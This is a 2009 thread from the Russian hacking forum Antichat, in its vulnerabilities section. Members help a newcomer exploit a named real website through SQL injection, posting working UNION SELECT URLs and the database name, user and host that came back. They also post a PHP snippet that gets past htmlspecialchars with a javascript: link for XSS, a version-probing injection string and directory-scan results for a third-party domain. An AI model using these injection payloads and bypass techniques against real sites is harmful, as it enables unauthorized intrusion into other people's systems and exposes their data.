HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10101  
Старый 12.11.2009, 21:28
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.

Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.

Последний раз редактировалось Ins3t; 12.11.2009 в 21:31..
 
Ответить с цитированием

  #10102  
Старый 12.11.2009, 21:29
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Цитата:
Сообщение от Krist_ALL  
http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root

а что дальше? объясни плиз
 
Ответить с цитированием

  #10103  
Старый 12.11.2009, 21:31
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от Ins3t  
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
 
Ответить с цитированием

  #10104  
Старый 12.11.2009, 21:31
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
С нами: 8777275

Репутация: 3
По умолчанию

как обходится htmlspecialchars??
 
Ответить с цитированием

  #10105  
Старый 12.11.2009, 21:33
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами: 8681832

Репутация: 0
По умолчанию

n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
 
Ответить с цитированием

  #10106  
Старый 12.11.2009, 21:37
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о
1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:

PHP код:
<?php 
$a 
"javascript:document.write('<script>alert(0)</script>');";
$data htmlspecialchars($a); 
echo 
"<a href=$data>Tikni</a>";
?>
просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте

Последний раз редактировалось Pashkela; 12.11.2009 в 21:48..
 
Ответить с цитированием

  #10107  
Старый 12.11.2009, 21:37
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

Цитата:
Сообщение от [x60]unu  
Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять
ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4
 
Ответить с цитированием

  #10108  
Старый 12.11.2009, 21:38
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
С нами: 8842000

Репутация: 43
По умолчанию

Цитата:
Сообщение от fng  
n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log
 
Ответить с цитированием

  #10109  
Старый 12.11.2009, 21:39
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

2fng,

Код:
http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens
вывод в свойставх картинки
 
Ответить с цитированием

  #10110  
Старый 12.11.2009, 21:45
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами: 8681832

Репутация: 0
По умолчанию

спасибо парни, вроде так же делал, не заметил может вывод...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...